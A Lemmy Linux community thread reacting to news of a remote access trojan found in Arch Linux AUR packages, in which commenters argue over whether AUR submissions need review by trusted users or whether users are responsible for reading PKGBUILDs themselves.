this post was submitted on 01 Aug 2025
84 points (93.8% liked)

Linux

8723 readers
468 users here now

A community for everything relating to the GNU/Linux operating system (except the memes!)

Also, check out:

Original icon base courtesy of lewing@isc.tamu.edu and The GIMP

founded 2 years ago
MODERATORS
Ategon@programming.dev
anzo@programming.dev
dwraf_of_ignorance@programming.dev
84
Arch Linux Users at Risk Again as AUR Hit by Another RAT (news.itsfoss.com)
submitted 1 day ago by cm0002@programming.dev to c/linux@programming.dev
33 comments fedilink hide all child comments
you are viewing a single comment's thread
view the rest of the comments
[–] generator@lemmy.zip 18 points 1 day ago* (last edited 1 day ago) (5 children)

That's why you shouldn't blindly trust AUR, and always review the scripts before installing.

But something needs to change:

  • packages need to be reviewed (maybe also updates on new/untrusted users)
  • New package adoption need to be reviewed
  • Trusted users don't need package review
  • Trusted users can review new packages (from other users)

This won't stop here, more malware packages will appear, arch and Linux in general is getting more users and becoming a target, not only ArchLinux AUR but also other distros with custom repositories. Many users install packages from custom repositories blindly, or follow guides without any knowledge what they do.

2025 is the year of malware on Linux

[–] h4x0r@lemmy.dbzer0.com 11 points 21 hours ago (1 children)

Why does anything need to change? The AUR is functioning as intended, a low friction system for users to provide packages outside of the official repositories. This has always been a possible consequence of not reviewing the PKGBUILD. I don't see why everything needs guardrails, some things have sharp edges, handle with care!

Given how often the 'btw' spammers evangelize how they learned soooo much about linux and their 'minimal system' cause they managed to format a disk manually and chroot, not installing malware from an untrusted source ought to be a no brainer. Even if you solved this particular problem the same people will be just a curl | sh away from pwning themselves. Should we start requiring forced auth to pipe?

The maintainers are welcome to do whatever they like, but it would be nice to have at least a few places where we don't cater to the lowest common denominator and still RTFM.

[–] generator@lemmy.zip 1 points 19 hours ago* (last edited 19 hours ago)

Just the case of the packages being removed only a few hours after been published just makes my point of "trusted users" reviewing and reporting then.

And is not only an archlinux/AUR problem, the same happens with python pip, npm, dockerhub, github... With bigger popularity, bigger the target.

These days after the success of Steamdeck many users switched to Linux, and many of those started using arch or based distros like EndeavourOS because some one on reddit, YouTube or other said is the best for new hardware and you can find everything you need on AUR.
New users won't review scripts or PKGBUILD, that's gibberish, just search and install, and a few hours could be too late for some.

I don't care if Linux loses or gains popularity, but if there's no guard rails of some kind of control things could get worse, and even end AUR as it is now.

Having people control what's published or not, probably not the best solution, but leaving it as a wild west also not

load more comments (3 replies)